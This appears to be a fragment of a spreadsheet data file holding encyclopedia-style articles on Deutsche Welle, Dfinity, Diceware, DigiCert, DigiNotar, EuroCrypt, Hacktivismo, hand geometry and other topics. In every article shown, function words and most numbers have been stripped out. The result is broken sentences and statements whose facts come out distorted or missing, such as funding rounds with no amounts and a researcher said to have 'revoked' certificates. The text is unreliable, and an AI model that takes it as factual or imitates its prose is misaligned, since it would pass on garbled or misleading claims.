german programming hours english, whilst dw-tv asia+ contains hours english programmes plus hours german programmes.in august 2009, dw-tv's carriage united kingdom channel ceased, although channel continues available european satellites receivable uk.in 2011, announced major reduction service including closure services balkans (except romani), would expand network partners africa. radio production hausa, kiswahili, french, portuguese africa optimized broadcasts also produces regional radio magazine daily english, rebroadcast partners africa. audio content arabic distributed online, mobile, rebroadcast partners. announced would focus partnerships bengali, urdu, dari/pashtu, indonesian south asia, india, pakistan, afghanistan. november 2011, discontinued shortwave broadcasts german, russian, persian, indonesian ended english service outside africa. chinese programming reduced minutes minutes week. november 2011, broadcast radio programming shortwave amharic, chinese, dari, english french africa, hausa, kiswahili, pashtu, portuguese africa urdu.the budget deutsche welle 2016 301.8 million euros.on february 2018, dw-tv published "the climate cover oil's campaign deception" (2018) documents confirmed companies known burning fossil fuels impacts climate since 1957. funding deutsche welle funded federal grants taken federal revenue.since reorganisation broadcasting result german reunification, deutsche welle remaining broadcasting corporation federal law. contrast national public broadcasters, financed license state broadcasters, deutschlandradio zdf, financed broadcasting fee, federal taxes. ministry culture media responsible financing, turn allows offer broadcast nonexistent advertising time. rebranding television news june 2015, launched 24-hour english-language news channel design studio part rebrand news. previously, dw's news programmes called journal broadcast english 30-minute blocks. channel offers 30-minute updates every hour 60-minute programmes twice weekdays. news broadcasts berlin frequently live social media segments hosted specially-designed studio bonn. german, spanish, arabic channels also received design. time, dw's news website moved .com added social media stream front page. refreshed services launched tagline 'made minds'. plans future deutsche welle developed two-tier approach using future growth company consists global approach regional approach. within global approach, made plans boost competitiveness market throughout world news television coverage. plan implements covering mostly regions world television channels region. with exclusions, entire world covered. hours covered ranges throughout regions coverage german, english, spanish, arabic.the regional approach looks marketing internet offer news coverage languages offered. with updates dw's website news better tailored region. over time, plan diversify online coverage regional content covered. censorship april 2019, announced venezuela's state telecoms regulator conatel halted spanish-language channel. april, broadcasting service restored.in 2019, russian ministry foreign affairs accused calling russians take part recent anti-government protests, threatened would take action outlet domestic made calls again. shortly after, russia's parliament accused breaking election legislation asked foreign ministry consider revoking german broadcaster's right work country. november, russian foreign minister sergei lavrov declared support banning foreign media outlets.on february 2022, retaliation germany's broadcasting regulator's decision transmission russian state-run deutsch channel lack broadcasting license, russian foreign ministry said would shut dw's moscow bureau, strip staff accreditation terminate broadcasting russia. also stated would begin procedure designating "foreign agent".the moscow office deutsche welle informed would shut 9:00 friday, february 2022. made plans relocate moscow operations latvian capital, riga.on june 2022, banned turkey upon request radio television supreme council (rtük). rtük, ordered february 2022 license terminate service turkey. logos broadcast languages partly deutschlandfunk (until 1993) shortwave relay stations shortwave relay stations outside germany trincomalee, lanka (1984 2013) sold lanka broadcasting cooperation shortwave transmitters mediumwave transmitter antennas verified) kigali, rwanda: relay station kigali, rwanda, inaugurated august 1963, provided coverage africa. this relay station closed march 2015. shortwave transmitters sines, portugal closed october 2011 dismantled months. shortwave transmitters radio antilles, montserratdw used relay station malta three kw-mw transmitter gave partial coverage americas, southern asia east. inaugurated july 1974 exchange grant almost million gbp. station closed january 1996. formerly, shared transmitting station antigua caribbean bbc. inaugurated november 1976 closed march 2005. relay-exchange canadian broadcasting corporation allowed transmitters sackville, brunswick facility closed 2012.in july 2011 deutsche welle began implementing major reform. main changes radical reduction shortwave radio broadcasting—from daily total hours—and expansion television broadcasting. relay stations leasing transmitter time 2013, leased time following relay stations: woofferton, united kingdom (bbc world service) kranji, singapore (bbc eastern relay station) dhabayya, united arab emirates (united emirates radio) nakhon sawan, thailand (bbc east asian relay station) ascension island (bbc atlantic relay station) meyerton, south africa (sentech) personnel directors-general october 1960 february 1968: hans otto wesemann march 1968 february 1980: walter steigner march 1980 december 1980: conrad ahlers december 1980 june 1981: heinz fellhauer (interim) july 1981 june 1987: klaus schütz july 1987 june 1989: heinz fellhauer july 1989 march 2001: dieter weirich april 2001 september 2001: reinhard hartstein (interim deputy intendant) october 2001 september 2013: erik bettermann october 2013–present: peter limbourg presenters sebastian phil gayle akademie akademie deutsche welle's international center media development, media consulting journalism training. offers training consulting services partners around world. works broadcasters, media organizations, universities especially developing transitioning countries promote free independent media. work funded mainly german federal ministry economic cooperation development. additional sponsors german foreign office european union. akademie's journalism traineeship 18-month program young journalists provides editorial training three areas deutsche welle produces content: radio, television online. aimed aspiring journalists germany well regions deutsche welle broadcasts.the "international media studies" master's program, offered cooperation university bonn university bonn-rhein-sieg applied sciences, based akademie. four-semester program combines disciplines media development, media regulation, communications. seminars held english german degree aimed media representatives developing transitioning countries. carsten nahmen became head akademie september 2018. dw's senior correspondent washington since february 2017 prior this, deputy editor-in-chief head dw's main news department since 2014. christian gramsch director akademie november 2013 2018, prior dw's regional director multimedia. succeeded akademie director gerda meuer, previously deputy editor-in-chief deutsche welle's radio program, earlier worked various media outlets correspondent inter news service. schaeffer akademie's deputy head since 2014 previously deutsche welle's editor-in-chief. learn german section deutsche welle's website section dedicated providing material interested learning german language levels based common european framework reference languages. they offer free video audio courses access exercises transcripts. users also search suitable courses test level among material available site, offer free access animated series called "harry lost time" (harry gefangen zeit), beginners. through flash animation, series tells story fictional character named harry walkott, struck lightning black forest vacation germany and, this, becomes stuck time, repeating over. with english narration, series introduces german expressions, words grammar explanations, also provides exercises user. antisemitism controversies november 2021, süddeutsche zeitung published investigation social media comments allegedly made members dw's arabic service, including posts appeared downplay holocaust perpetuate anti-jewish stereotypes. december 2021, announced suspending four employees freelancer external investigation, former german justice minister sabine leutheusser-schnarrenberger psychologist ahmad mansour, allegations. february, investigation concluded correct suspend five employees, recommended action eight employees; also recommended ending cooperation agreements middle east-based news outlets, concluded "structural antisemitism" following report, terminated contracts several employees, including former bureau chief beirut, advocated execution "[a]nyone israelis"; employee claimed israel controls people's brains "through art, media music"; third journalist posted "the holocaust lie." several fired stated given chance defend case, criticized dw's lack clarity regarding guidelines constituted antisemitism, said felt censored could write israeli-palestinian conflict.on december 2021, deutsche welle announced would suspend partnership jordanian partner, roya account antisemitic content published roya's social media. guido baumhauer, senior executive apologized, saying: truly sorry notice disgusting images." roya rejected accusation said target "hostile campaign" unnamed parties. also euronews karin helmstaedt presenter euromaxx culture lifestyle show hofmann brussels bureau chief belgium notes references citations sources external links official website</t>
  </si>
  <si>
    <t>Dfinity</t>
  </si>
  <si>
    <t>dfinity foundation not-for-profit organisation developing internet computer. internet computer public blockchain platform based network sub-blockchains governed ownerless master blockchain. web3 platform designed enhance internet form server-less cloud-functionality. internal cryptocurrency short form underlying protocol, internet computer protocol. history origins (2015 2019) internet computer conceived 2015 programmer dominic williams, idea world computer cannot shut down; originated ethereum ecosystem. dfinity later founded williams october 2016.in 2018, prominent venture capital firms andreessen horowitz, polychain capital, angel, wanxiang blockchain provided financial contributions less network's governance tokens.dfinity raised million andreesen horowitz polychain capital february 2018 funding round. $102 million funding round august 2018 brought project's total funding $195 million.in 2018, dfinity distributed around million swiss francs worth dfinity tokens airdrop. regulatory concerns, none tokens distributed residents. development (2019–2021) from 2019 2021, internet computer formally developed several named versions: copper, bronze, tungsten, sodium, mercury.on june 2020, tungsten developer network) version announced online event. enabled third-party developers start using platform develop smartphone apps.on september 2020, sodium version announced online event. this version included network nervous system (nns), open algorithmic governance system internet computer. organizational structure dfinity dfinity registered non-profit foundation zug.dfinity oversees research development centers palo alto, francisco, tokyo, shanghai, zürich. design internet computer internet computer maintained many independent data centers derives security distinctive system cryptographic signatures known threshold relay consensus. detailed 2018 white paper, internet computer's consensus mechanism consists following four layers: identities registry: active participants registered permanent pseudonymous identities. random beacon: using digital signature scheme, registered participants jointly generate random output, unpredictable anyone becomes available everyone. blockchain fork resolution: using random output random beacon layer, participant ranked deterministically. proposed blocks weighted according proposers' ranks blocks higher-ranked proposers receive higher weight), forks resolved prioritizing chain highest total block weight. notarization finality: blocks notarized threshold signatures created jointly registered clients. blocks must notarized order included chain. transaction final notarizations.to join internet computer, data center must obtain data center identity.the internet computer builtin algorithmic governance system known network nervous system.icp native cryptocurrency internet computer. transactions internet computer finalized seconds. references external links official website</t>
  </si>
  <si>
    <t>Diceware</t>
  </si>
  <si>
    <t>diceware method creating passphrases, passwords, cryptographic variables using ordinary dice hardware random number generator. word passphrase, five rolls six-sided required. numbers come rolls assembled five-digit number, e.g. 43146. that number used look word cryptographic word list. original list 43146 corresponds munch. generating several words sequence, lengthy passphrase thus constructed randomly. diceware word list list {\displaystyle 6^{5}=7\,776} unique words, preferably ones user find easy spell remember. contents word list protected concealed way, security diceware passphrase number words selected, number words selected word could taken from. lists compiled several languages, including basque, bulgarian, catalan, chinese, czech, danish, dutch, english, esperanto, estonian, finnish, french, german, greek, hebrew, hungarian, italian, japanese, latin, māori, norwegian, polish, portuguese, romanian, russian, slovak, slovenian, spanish, swedish turkish. level unpredictability diceware passphrase easily calculated: word adds 12.9 bits entropy passphrase (that {\displaystyle \log _{2}(6^{5})} bits). originally, 1995, diceware creator arnold reinhold considered five words (64.6 bits) minimal length needed average users. however, 2014 reinhold started recommending least words (77.5 bits) used.this level unpredictability assumes potential attacker know three things: diceware used generate passphrase, particular word list used, exactly many words make passphrase. attacker less information, entropy greater 12.9 bits word. calculations diceware algorithm's entropy assume that, recommended diceware's author, word separated space. instead, words simply concatenated, calculated entropy slightly reduced redundancy; example, three-word diceware phrases clammy" "input clam become identical spaces removed. wordlists electronic frontier foundation published three alternative english diceware word lists 2016, emphasizing ease-of-memorization bias obscure, abstract otherwise problematic words; tradeoff typical eff-style passphrases require typing larger number characters. snippet original diceware word list consists line 7,776 possible five-die combinations. excerpt: 43136 mulct 43141 mule 43142 mull 43143 multi 43144 43145 mummy 43146 munch 43151 mung examples diceware wordlist passphrase examples: dobbs bella bump flash begin ansi easel venom aver flung calleff wordlist passphrase examples: conjoined sterling securely chitchat spinout pelvis rice immorally worrisome shopping traverse rechargerthe xkcd #936 strip shows password similar diceware generated one, even used wordlist shorter regular 7776-words list used diceware. also brute-force attack size discusses many bits considered "secure". biometric word list uses lists words, word representing bits. s/key uses list 2,048 words encode 64-bit numbers english words password strength random password generator hashcat what3words notes references internet secrets, edition, john levine, editor, chapter books, 2000, isbn 0-7645-3239-1 external links english diceware page complete description word lists several languages. client-side diceware multi-wordlist password generator complete source code web-based diceware uses cryptographically secure getrandomvalues() function english diceware wordlist electronic frontier foundation</t>
  </si>
  <si>
    <t>DigiCert</t>
  </si>
  <si>
    <t>digicert, inc. american technology company focused digital security headquartered lehi, utah, offices australia, ireland, japan, india, south africa, switzerland united kingdom. certificate authority (ca) trusted third party, digicert provides public infrastructure (pki) validation required issuing digital certificates tls/ssl certificates. these certificates used verify authenticate identities organizations domains protect privacy data integrity users’ digital interactions browsers, email clients, documents, software programs, apps, networks connected devices. according independent survey company netcraft, "digicert world's largest high-assurance certificate authority, commanding extended validation certificate market, organization-validated certificates globally." history digicert founded bretschneider 2002. bretschneider served chairman board 2012 appointed executive chairman nicholas hales became ceo. 2016, company named john merrill ceo.in 2015, digicert acquired cybertrust enterprise business verizon enterprise solutions, becoming world's second-largest certificate authority high-assurance extended validation (ev) tls/ssl certificates.on august 2015, largest investments utah-based company date, private equity firm thoma bravo acquired majority stake digicert, associates leading global growth private equity firm, holding minority share. thoma bravo quoted saying, "digicert represents outstanding investment opportunity back market leader… known consistent innovation first-rate customer service."in 2017, digicert acquired tls/ssl businesses world's largest certificate authority, symantec (including brands geotrust, rapidssl (part geotrust), thawte verisign), $950 million. acquisition resulted questions first raised 2015 browsers google mozilla authenticity certificates issued symantec, represented one-third tls/ssl certificates web. september 2017, google mozilla announced would "... reduce, ultimately remove, trust symantec's root keys order uphold users’ security privacy browsing web." final distrust deadline certificates chaining symantec roots october 2018. symantec agreed transfer certificate business tls/ssl competitor, digicert, whose roots trusted browsers. december 2017, digicert began issuing free replacements distrusted certificates symantec, geotrust, rapidssl, thawte verisign. oct. 2018, company revalidated 550,000 organizational identities issued million replacement certificates affected customers.in 2018, digicert acquired quovadis, trust service provider (tsp) headquartered switzerland offering qualified digital certificates, services primosign electronic signature software. qualified digital certificates quovadis (now backed digicert) comply eidas, standards electronic transactions requiring legal proof authentication. payment services directive mandates banks financial institutions operating europe begin using qualified digital certificates jun. 2019. according digicert, "... quovadis acquisition aligns company's vision providing globally dispersed robust pki-based solutions local support."in 2019, company announced division called digicert labs, "... initiative dedicated researching developing innovative approaches security challenges." digicert labs collaborate enterprise labs including microsoft research, utimaco, isara gemalto make grants universities study topics related authentication, data integrity, encryption identity. initial research projects focus post-quantum cryptography machine learning.in 2019, clearlake capital group, l.p., leading private investment firm, associates, existing investor, reached agreement make strategic growth investment digicert. part transaction, clearlake associates become equal partners company.in 2020, according independent survey company netcraft, "digicert world's largest high-assurance certificate authority, commanding extended validation certificate market, organization-validated certificates globally."digicert member ca/browser forum, industry consortium creates guidelines standards participating certificate authorities browsers. dean coclin, director business development digicert, serve vice-chairperson ca/browser forum nov. 2018 oct. 2020.digicert inc. relation digicert sdn. bhd, malaysian-based certification authority issues certificates weak keys trust revoked browsers.in january 2022, digicert acquired security company mocana. criticism 2019, google security researcher scott helme revoked approximately million dollars worth extended verification certificates, significant portion digicert certificates. qwac digicert condemned pushing qwac scheme certificate similar certificates undermined trust certificates. references external links official website</t>
  </si>
  <si>
    <t>DigiD</t>
  </si>
  <si>
    <t>digid identity management platform government agencies netherlands, including customs administration dienst uitvoering onderwijs, verify identity dutch residents internet. 2015 used million authentications million citizens. system tied dutch national identification number (burgerservicenummer, bsn). system mandatory submitting forms electronically since 2006. 2011 hacking incident july 2011, diginotar, company providing certificates used digid root-ca pkioverheid, suffered theft hundreds certificate codes. although directly linked certificates used digid, result hack government lost trust certificates issued company, root well certificates governments' root pkioverheid. prosecutors said would investigate u.s.-owned, netherlands-based diginotar. also electronic identity card references external links official website</t>
  </si>
  <si>
    <t>DigiNotar</t>
  </si>
  <si>
    <t>diginotar dutch certificate authority owned vasco data security international, inc. september 2011, become clear security breach resulted fraudulent issuing certificates, dutch government took operational management diginotar's systems. that month, company declared bankrupt.an investigation hacking dutch-government appointed fox-it consultancy identified 300,000 iranian gmail users main target hack (targeted subsequently using man-in-the-middle attacks), suspected iranian government behind hack. while nobody charged break-in compromise certificates 2013), cryptographer bruce schneier says attack "either work nsa, exploited nsa." however, disputed, others saying detected foreign intelligence service using fake certificates. hack also claimed so-called comodohacker, allegedly 21-year-old iranian student, also claimed hacked four certificate authorities, including comodo, claim found plausible f-secure, although fully explaining subsequent "widescale interception iranian citizens".after fake diginotar certificates found, major browser makers reacted blacklisting diginotar certificates. scale incident used organizations like enisa accessnow.org call deeper reform https order remove weakest link possibility single compromised affect many users. company diginotar's main activity certificate authority, issuing types certificate. first, issued certificates name (where root "diginotar root ca"). entrust certificates issued since july 2010, still valid july 2013. secondly, issued certificates dutch government's pkioverheid ("pkigovernment") program. this issuance intermediate certificates, chained "staat nederlanden" root cas. national local dutch authorities organisations offering services government want certificates secure internet communication request certificate. some most-used electronic services offered dutch governments used certificates diginotar. examples authentication infrastructure digid central car-registration organisation netherlands vehicle authority (rdw). diginotar's root certificates removed trusted-root lists major browsers consumer operating systems around august 2011; "staat nederlanden" roots initially kept believed compromised. however, since revoked. history diginotar originally 1998 dutch notary dick batenburg beverwijk koninklijke notariële beroepsorganisatie, national body dutch civil notaries. offers kind central services notaries, many services notaries offer official legal procedures, security communications important. offered advisory services members implement electronic services business; activities offering secure certificates. dick batenburg formed group notarissen (ttp notaries), stands trusted third party. notary become member notarissen comply certain rules. comply additional rules training work procedures, become accredited notary.although diginotar general-purpose several years, still targeted market notaries professionals. january 2011, company sold vasco data security international. vasco press release dated june 2011, diginotar first detected incident systems vasco's president valcke quoted stating believe diginotar's certificates among reliable field." bankruptcy september 2011, vasco announced subsidiary diginotar declared bankrupt filing voluntary bankruptcy haarlem court. effective immediately court appointed receiver, court-appointed trustee takes management diginotar's affairs proceeds bankruptcy process liquidation. refusal publish report curator (court-appointed receiver) want report itsec published, might lead additional claims towards diginotar. report covered company operated details hack 2011 bankruptcy.the report made request dutch supervisory agency opta refused publish report first place. freedom information (wet openbaarheid bestuur) procedure started journalist, receiver tried convince court allow publication report, confirm opta's initial refusal so.the report ordered released, made public october 2012. shows near total compromise systems. issuance fraudulent certificates july 2011, attacker access diginotar's systems issued wildcard certificate google. this certificate subsequently used unknown persons iran conduct man-in-the-middle attack google services. august 2011, certificate problems observed multiple internet service providers iran. fraudulent certificate posted pastebin. according subsequent news release vasco, diginotar detected intrusion certificate authority infrastructure july 2011. diginotar publicly reveal security breach time. after certificate found, diginotar belatedly admitted dozens fraudulent certificates created, including certificates domains yahoo!, mozilla, wordpress project. diginotar could guarantee certificates revoked. google blacklisted certificates chromium, final known total misissued certificates least 531. investigation f-secure also revealed diginotar's website defaced turkish iranian hackers 2009.in reaction, mozilla revoked trust diginotar root certificate supported versions firefox browser microsoft removed diginotar root certificate list trusted certificates browsers supported releases microsoft windows. chromium google chrome able detect fraudulent *.google.com certificate, "certificate pinning" security feature; however, protection limited google domains, resulted google removing diginotar list trusted certificate issuers. opera always checks certificate revocation list certificate's issuer initially stated need security update. however, later also removed root trust store. september 2011, apple issued security update 2011-005 10.6.8 10.7.1, removes diginotar list trusted root certificates certificate authorities. without update, safari detect certificate's revocation, users must keychain utility manually delete certificate. apple patch october 2011, release 5.diginotar also controlled intermediate certificate used issuing certificates part dutch government’s public infrastructure "pkioverheid" program, chaining official dutch government certification authority (staat nederlanden). once intermediate certificate revoked marked untrusted browsers, chain trust certificates broken, difficult access services identity management platform digid customs administration. govcert.nl, dutch computer emergency response team, initially believe pkioverheid certificates compromised, although security specialists uncertain. because certificates initially thought compromised security breach, were, request dutch authorities, kept exempt removal trust although two, active "staat nederlanden root certificate, overlooked mozilla engineers accidentally distrusted firefox build. however, assessment rescinded audit dutch government, diginotar-controlled intermediates "staat nederlanden" hierarchy also blacklisted mozilla next security update, also browser manufacturers. dutch government announced september 2011, switch different firm certificate authority. steps taken dutch government after initial claim certificates diginotar-controlled intermediate certificate pkioverheid hierarchy affected, investigation external party, fox-it consultancy, showed evidence hacker activity machines well. consequently, dutch government decided september 2011, withdraw earlier statement nothing wrong. (the fox-it investigators dubbed incident "operation black tulip".) fox-it report identified 300,000 iranian gmail accounts main victims hack.diginotar available pkioverheid, certificates used dutch government root affected. when dutch government decided lost trust diginotar, took back control company's intermediate certificate order manage orderly transition, replaced untrusted certificates ones providers. much-used digid platform uses certificate issued getronics pinkroccade nederland b.v. according dutch government, diginotar gave full co-operation procedures. after removal trust diginotar, four certification service providers (csp) issue certificates pkioverheid hierarchy: digidentity electronische signatuur quovadis certificatiedienstverleningall four companies opened special help desks and/or published information websites organisations pkioverheid certificate diginotar request certificate remaining four providers. also comodo cybersecurity certificate hacking operation shady unit 61398 stuxnet tailored access operations references further reading fox-it (august 2012). black tulip: report investigation diginotar certificate authority breach. external links official website (english, mentioning bankruptcy) official website (dutch, mentioning bankruptcy) fraudulent certificates list common names diginotar reports security incident pastebin posts: gmail.com mitm attack iranian government -27/8/2011 internet death sentence diginotar's root mozilla foundation security advisory 2011-34: protection fraudulent diginotar certificates microsoft security advisory (2607712): fraudulent digital certificates could allow spoofing diginotar compromise mozilla's gervase markham's account mozilla blacklisted diginotar. johnathan nightingale (september 2011). "diginotar removal follow up". mozilla security blog. retrieved september 2011. account director firefox engineering mozilla corporation mozilla's removal diginotar trusted list temporary suspension, complete revocation trust. video youtube fox-it, showing subsequent ocsp requests iranian users diginotar certificates (likely attacks).</t>
  </si>
  <si>
    <t>Designated verifier signature</t>
  </si>
  <si>
    <t>designated verifier signature signature scheme signatures verified single, designated verifier, designated part signature creation. designated verifier signatures first proposed 1996 jakobsson markus, kazue sako, russell impagliazzo. proposed combine authentication off-the-record messages, designated verifier signatures allow authenticated, private conversations take place. unlike undeniable signature scheme protocol verifying non-interactive; i.e., signer chooses designated verifier designated verifiers) advance take part verification process. also non-repudiation undeniable signature references</t>
  </si>
  <si>
    <t>EuroCrypt</t>
  </si>
  <si>
    <t>eurocrypt conditional access system multiplexed analogue components-encoded analogue satellite television. several versions s2). supported receivers card slots embedded keys. widespread scandinavia, eurocrypt protected broadcasts remained july 2006 france, stopped 1998). also hacked pirate cards, popular many countries europe, especially order watch english-language channels filmnet plus tv1000. eurocrypt evolved viaccess system digital television. sources frequency list, dated 1998. denmark's radio receiver info</t>
  </si>
  <si>
    <t>European Investigative Collaborations</t>
  </si>
  <si>
    <t>european investigative collaborations (eic) network european collaborative hybrid project transnational investigative journalism. established fall 2015 founding members, including spiegel, mundo, mediapart, romanian centre investigative journalism (crji), soir, launched winter 2016. march 2016, three months research, published results first joint investigation spurred 2015 terrorist attacks paris, revealed spite security risk warnings, "the eu’s freedom goods policy facilitated sale weapons leading [the 2015] terror attacks paris." 2017 working "over journalists countries", published football leaks—the "largest leak sports history". objective through "joint reporting publication", aims strengthen european transnational investigative journalism joint reporting utmost transparency. they exchange documents articles coordinate publication, improve tools used investigations investigation another—for example data processing capabilities, servers, secure forums, etc. members falter (austria) mediapart (france) mundo (spain) politiken (denmark) soir (belgium) spiegel (germany) l'espresso (italy) handelsblad (netherlands) dagen nyheter (sweden) nacional (croatia) expresso (portugal) black (romania) history dataharvest 2015 networking events, discussions related "establishing european network" started "jörg schmitt, jürgen dahlkamp, alfred weinzierl klaus brinkbäumer spiegel stefan candea romanian centre investigative journalism (crji). stefan candea, founding partner explained following terrorist attacks, november 2015 paris attacks, journalists "started bounce ideas other." this first collaborative transnational investigation resulting series mapping weapons terror. others joined group, including, "alain lallemand soir, john hansen politiken, milorad ivanovic newsweek serbia, florian klenk falter, paula guisado mundo, vlad odobescu romanian centre investigative journalism, michael bird black sea, fabrice arfi mediapart vittorio malagutti l'espresso. 2017, handelsblad netherlands joined along dozens european media forty investigative journalists. black black sea, "award winning journalists photo-journalists romanian centre investigative journalism (crji)", project bringing together journalists, photographers videographers. investigations mapping weapons terror (march 2016) that story came meeting last year. essentials concerning network agreed started bouncing ideas other. easily guns available terrorist attacks like ones paris time happened? took there. after three months research march 2016, journalists published "mapping weapons terror" revealed "shadow market" east europe fuelled "terrorism west, criminal gangs legal loopholes open borders traffic weapons." they revealed spite security risk warnings, "the eu’s freedom goods policy facilitated sale weapons leading [the 2015] terror attacks paris." football leaks (2016/2017) working "over journalists countries" published "series articles called football leaks—the "largest leak sports history". football leaks "led prosecution football superstar cristiano ronaldo coach jose mourinho." malta files (2017) 2017, european investigative collaborations published malta files, investigation "how mediterranean state works pirate base avoidance inside although profiting advantages membership, malta also welcomes large companies wealthy private clients dodge taxes home countries." among included reports italian mafia figures, russian billionaires families turkey's president prime minister. also football leaks international consortium investigative journalists references external links official website</t>
  </si>
  <si>
    <t>Sumykhimprom ammonia leak</t>
  </si>
  <si>
    <t>march 2022 battle sumy, russian airstrike damaged ammonia tanks sumykhimprom plant, contaminating land within kilometres (1.6 radius including villages novoselytsya verkhnya syrovatka. direction wind, city sumy largely unaffected despite proximity leak. background days prior leak mikhail mizintsev, chief russia's national defense management center claimed ukrainian nationalists plotting false flag chemical attack sumy. mizintsev alleged march mines placed chemical storage facilities plant poison residents case russian troops advancement city. also alleged secondary school similarly sabotaged kotlyarovo, mykolaiv oblast. leak leak first reported 4:30 local time march 2022 sumykhimprom chemical plant, located suburbs sumy. references</t>
  </si>
  <si>
    <t>HX-63</t>
  </si>
  <si>
    <t>hx-63 advanced rotor machine designed crypto founder boris hagelin. development device started 1952 lasted decade. machine nine rotors, contacts. there keyboard inputs outputs, leaving wires "loop back" rotors different path. moreover, rotor wire could selected paths. movement rotors irregular controlled switches. there plugboards machine; scramble input, loop-back wires. machine also used technique called reinjection (also called reentry), increased security exponentially. machine could around 10600 different configurations.william friedman, first chief cryptologist u.s. national security agency (nsa), alarmed read hagelin's patent machine. friedman realized machine secure nsa's kl-7 unbreakable. friedman hagelin good friends world friedman called hagelin terminate program, cryptoag did.only twelve machines manufactured, adopted department french government (about 1960). also kl-7 references external links jerry proc's pages photographs brief description notice past ebay auction hx-63 john savard's discussion machine further reading cipher deavours louis kruh, "machine cryptography modern cryptanalysis", artech house, 1985, p199.</t>
  </si>
  <si>
    <t>HacDC</t>
  </si>
  <si>
    <t>hacdc hackerspace washington, d.c., 501(c)(3) nonprofit. according member's description, "hacdc members improve world creatively rethinking technology. break, build, occasionally abuse technology pursuit greater knowledge works re-purpose build things." march 2009, activities described washington post. april 2011, activities also mentioned fastcompany., npr's tech considered. membership hacdc encourages participation anyone feels contribute, non-members welcome space time. workshops activities free, exceptions materials costs, open public. january 2015, membership stands people. dues, give organizational voting rights, month january 2015.hacdc's active pool members brings wide range skills interests community—ranging science, visual performing arts, electronics mechanical design. this results unusual interesting collaborations among members, appeared washington, area exhibits performances. physical space hacdc located second floor office building stephen incarnation episcopal church, 1525 newton intersection 16th newton streets, columbia heights neighborhood washington, space classroom-workshop upstairs meetings, presentations, classes electronics projects. includes tools, soldering station, electronic diagnostic equipment several printers. separate basement room mainly used heavier tools parts storage also includes drill press, mill, sheet metal bender optical table. church's common spaces available larger events. activities some past present programs activities include: microcontroller workshops projects: microcontroller mondays, class printing, printer assembly repair, part design using implicitcad. fpga workshops projects builds designing nikolas's heart kit, adafruit game life build hacdc lightning talks narg natural language research group gentle hacker's literary salon reprap printer hacdc spaceblimp crispr-cas9 bacterial gene editing project. scanning electron microscope refurbishment project. elements computing systems class bike maintenance class participating great global hackerspace challenge [2][3] experimentation mobile networking updated list found official calendar. references external links hacdc.org hackerspaces.org</t>
  </si>
  <si>
    <t>Hacktivismo</t>
  </si>
  <si>
    <t>hacktivismo offshoot cult dead (cdc), whose beliefs include access information basic human right. founded 1999. group's beliefs described fully hacktivismo declaration, seeks apply universal declaration human rights international covenant civil political rights internet. oxblood ruffin, director hacktivismo, argued forcefully definitions hacktivism include defacements denial-of-service attacks. hacktivismo also authored software license agreement, hacktivismo enhanced-source software license agreement (hessla). hessla prohibits modification would violate human rights introduce features user. connection 1999 cult dead (cdc), loose network individuals, announced formation hacktivismo. group explore ways preventing censorship internet. particular hacktivismo focused firewalls censoring mechanisms national governments. press releases made clear hacktivismo different groups; however hacktivismo also described "special operations group" cdc. press release early 2002 described hacktivismo international cadre hackers founded cdc's oxblood ruffin". hacktivismo declaration group's beliefs described fully "hacktivismo declaration" list "assertions liberty support uncensored internet" seeks apply universal declaration human rights international covenant civil political rights (iccpr) internet. declaration recalls duty member states iccpr protect right freedom expression regards internet context called "freedom information". hacktivismo declaration states: "...such member states continue willfully suppress wide-ranging access lawfully published information internet, despite clear language iccpr freedom expression exists media," "...that transnational corporations continue sell information technologies world's repressive regimes knowing full well used track control already harried citizenry," "...that internet fast becoming method repression rather instrument liberation," "...that countries crime demand right access lawfully published information, basic human rights," "...that denying access information could lead spiritual, intellectual, economic decline, promotion xenophobia destabilization international order."the hacktivismo declaration recognizes "the importance fight human rights abuses respect reasonable access information internet" calls upon hacker community "study ways means circumventing state sponsored censorship internet" "implement technologies challenge information rights violations". hacktivismo declaration however recognize right freedom expression subject limitations, stating recognized right governments forbid publication properly categorized state secrets, child pornography, matters related personal privacy privilege, among accepted restrictions." however, hacktivismo declaration states "but oppose state power control access works critics, intellectuals, artists, religious figures." projects camera/shy camera/shy first hacktivismo project released. debuted 2002 h.o.p.e. convention york city. written pull, camera/shy steganographic tool scans delivers decrypted content directly world wide web. stand-alone, internet explorer-based browser. interprets displays hidden information stored junk bits files. six/four system six/four system written mixter. software censorship resistant network proxy. works using "trusted peers" relay network connections encrypted links. example, distribution includes program proxy, connections hidden reach trusted peer.hacktivismo gained notoriety 2003 six/four system became first product hacker group receive approval united states department commerce export strong encryption. scatterchat scatterchat encrypted instant messaging client based gaim. written salvatore testa released h.o.p.e. number conference york city july 2006. source code available, licensed hessla. provides encryption well integrated onion routing tor, secure file transfers. scatterchat's security features include immunity replay attacks limited resistance traffic analysis. various flaws software elaborated researchers. torpark xerobank browser (formerly known torpark) variant portable firefox browser built xerobank intended portable media flash drive also used hard disk drive. cdc/hacktivismo co-released v.1.5.0.7 along steve topletz september 2006. notable members oxblood ruffin mixter anonymouspef bronc buster references further reading external links hacktivismo homepage hacktivismo's projects page</t>
  </si>
  <si>
    <t>Hand geometry</t>
  </si>
  <si>
    <t>hand geometry biometric identifies users shape hands. hand geometry readers measure user's palm fingers along many dimensions including length, width, deviation, angle compare measurements measurements stored file. history viable hand geometry devices manufactured since early 1970s, making hand geometry first biometric find widespread computerized use. robert miller realized distinctive features hand sizes shapes could used identification patented first automated hand geometry device stanford research institute 1971. device would measure hand, numbers needed match punched holes user card activate circuit identified. david sidlauskas also major player hand geometry device production, patented handkey id3d, first hand scanner worked involved optical measuring plate, camera, numeric keypad enter personal pin. add-on hand geometry thought unique fingerprints, palm veins irises. fingerprinting iris recognition remain preferred technology high-security applications. large populations, hand geometry suitable so-called one-to-many applications, user identified biometric without identification. however, hand geometry reliable combined forms identification, identification cards personal identification numbers. there also proposed methods include hand-geometry palm print-based verification better accuracy performance. commercial there many patents issued devices measure hand geometry u.s. patent office.a hand-geometry system‚ identimat, used shearson hamil wall street track attendance, marking beginning biometric technology usage. based robert miller's patent, identimat utilized light sensing cells measure finger length magnetic strip card reader verify identification cards compared information given determine authorization person. although production ceased 1987, idea remains popular; common applications include access control time-and-attendance operations. advantages although hand geometry considered secure compared biometric points, advantages method. this includes: medium cost fast results low-computational cost algorithms reduced template size takes less storage easy pay-by-hand hand-recognition payment, also named pay-by-hand payment method uses scanning one's hand. alternative payment system using credit cards. technology uses biometric identification scanning client's hand reading various features like position veins bones tested amazon since 2019. also biometrics schools biometric technology access control inspass references references levicky, varchol, december 2007). "using hand geometry biometric security systems". radioengineering. citeseerx 10.1.1.502.6303. oclc 7181629680. varchol, levicky, juhar, (2008). "multimodal biometric authentication using speech hand geometry fusion". 2008 15th 